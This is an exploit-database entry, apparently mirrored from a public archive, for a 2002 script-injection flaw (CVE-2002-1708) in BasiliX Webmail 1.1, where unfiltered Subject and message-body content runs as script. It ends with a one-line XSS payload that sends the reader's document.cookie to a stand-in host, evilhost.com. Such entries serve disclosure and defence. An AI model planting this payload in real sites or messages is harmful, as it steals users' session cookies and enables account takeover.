[] NeoSense
E X P L O I T S
title author type platform port cve id

BasiliX Webmail 1.1 - Message Content Script Injection

Author: Ulf Harnhammar
type: webapps
platform: php
port: 
date_added: 2002-06-19 
date_updated: 2012-09-28 
verified: 1 
codes: CVE-2002-1708;OSVDB-21597 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/5060/info

BasiliX is a web-based mail application. It offers features such as mail attachments, address book, multiple language and theme support.

A script injection issue has been reported in BasiliX Webmail. Script commands are not filtered from the Subject or message body, and may execute in the context of the BasiliX site when the content is viewed.

This has been reported in BasiliX Webmail 1.1.0, earlier versions may also be affected.

<script>self.location.href="http://evilhost.com/evil?"+escape(document.
cookie)</script>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.